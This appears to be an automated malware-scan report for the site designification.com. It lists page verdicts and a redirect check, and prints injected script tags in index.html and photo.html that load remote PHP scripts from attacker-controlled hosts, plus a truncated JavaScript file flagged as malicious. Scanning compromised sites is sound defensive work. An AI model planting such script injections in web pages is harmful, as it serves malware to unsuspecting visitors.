Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=designification.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://designification.com/ | HTTP/1.1 200 OK Connection: close Date: Wed, 16 Apr 2014 04:31:09 GMT Accept-Ranges: bytes ETag: "70b479416558cf1:16f5" Server: Microsoft-IIS/5.0 Content-Length: 19648 Content-Location: http://designification.com/index.html Content-Type: text/html Last-Modified: Tue, 15 Apr 2014 04:43:33 GMT MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET | clean |
http://designification.com/index.html | 200 OK Content-Length: 19648 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://nangala.com/Bkcm4z3Z.php?id=16892446"></script> | ||
http://designification.com/Pages/gen.html | 200 OK Content-Length: 12796 Content-Type: text/html | clean |
http://designification.com/Pages/../GeneratedItems/CSScriptLib.js | 200 OK Content-Length: 6889 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) CSInit = new Array;function CSScriptInit() {if(typeof(skipPage) != "undefined") { if(skipPage) return; }idxArray = new Array;for(var i=0;i<CSInit.length;i ) idxArray[i] = i;CSAction2(CSInit, idxArray);}CSAg = window.navigator.userAgent; CSBVers = parseInt(CSAg.charAt(CSAg.indexOf("/") 1),10);CSIsW3CDOM = ((document.getElementById) && !(IsIE()&&CSBVers<6)) ? true : false;function IsIE() { return CSAg.indexOf("MSIE") > 0;}function CSIEStyl(s) { return document.all.tags("d Antivirus reports:
| ||
http://designification.com/Pages/gg_res_email.pdf | 200 OK Content-Length: 52825 Content-Type: application/pdf | clean |
http://designification.com/test404page.js | 404 Object Not Found Content-Length: 4040 Content-Type: text/html | clean |
http://designification.com/Pages/graph_print.html | 200 OK Content-Length: 11690 Content-Type: text/html | clean |
http://designification.com/Pages/photo.html | 200 OK Content-Length: 11321 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: glv189.internetdsl.tpnet.pl <script src="http://glv189.internetdsl.tpnet.pl/IUf9PPRU.php" type="text/javascript"></script><!--/339810-
</td> <td width="265" height="60"></td> <td width="1" height="60"><spacer type="block" width="1" height="60"></td> </tr> <tr height="38"> <td content="content" csheight="21" width="686" height="38" colspan="7" valign="top" align="left" x ...[3475 bytes skipped]... | ||
http://glv189.internetdsl.tpnet.pl/IUf9PPRU.php | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://designification.com/Pages/illustr.html | 200 OK Content-Length: 11099 Content-Type: text/html | clean |
http://designification.com/Pages/web.html | 200 OK Content-Length: 11282 Content-Type: text/html | clean |
http://designification.com/Pages/contact.html | 200 OK Content-Length: 10923 Content-Type: text/html | clean |
http://designification.com/Pages/form_02.asp | 200 OK Content-Length: 9782 Content-Type: text/html | clean |
http://designification.com/Pages/../index.html | 200 OK Content-Length: 19648 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://nangala.com/Bkcm4z3Z.php?id=16892446"></script> | ||
http://designification.com/Pages/../Pages/gen.html | 200 OK Content-Length: 12796 Content-Type: text/html | clean |
http://designification.com/Pages/../Pages/../GeneratedItems/CSScriptLib.js | 200 OK Content-Length: 6889 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) CSInit = new Array;function CSScriptInit() {if(typeof(skipPage) != "undefined") { if(skipPage) return; }idxArray = new Array;for(var i=0;i<CSInit.length;i ) idxArray[i] = i;CSAction2(CSInit, idxArray);}CSAg = window.navigator.userAgent; CSBVers = parseInt(CSAg.charAt(CSAg.indexOf("/") 1),10);CSIsW3CDOM = ((document.getElementById) && !(IsIE()&&CSBVers<6)) ? true : false;function IsIE() { return CSAg.indexOf("MSIE") > 0;}function CSIEStyl(s) { return document.all.tags("d Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: designification.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 16 Apr 2014 04:31:09 GMT
Accept-Ranges: bytes
ETag: "70b479416558cf1:16f5"
Server: Microsoft-IIS/5.0
Content-Length: 19648
Content-Location: http://designification.com/index.html
Content-Type: text/html
Last-Modified: Tue, 15 Apr 2014 04:43:33 GMT
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
...19648 bytes of data.
GET / HTTP/1.1
Host: designification.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 16 Apr 2014 04:31:09 GMT
Accept-Ranges: bytes
ETag: "70b479416558cf1:16f5"
Server: Microsoft-IIS/5.0
Content-Length: 19648
Content-Location: http://designification.com/index.html
Content-Type: text/html
Last-Modified: Tue, 15 Apr 2014 04:43:33 GMT
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
...19648 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: designification.com
Referer: http://www.google.com/search?q=designification.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: designification.com
Referer: http://www.google.com/search?q=designification.com
Result:
The result is similar to the first query. There are no suspicious redirects found.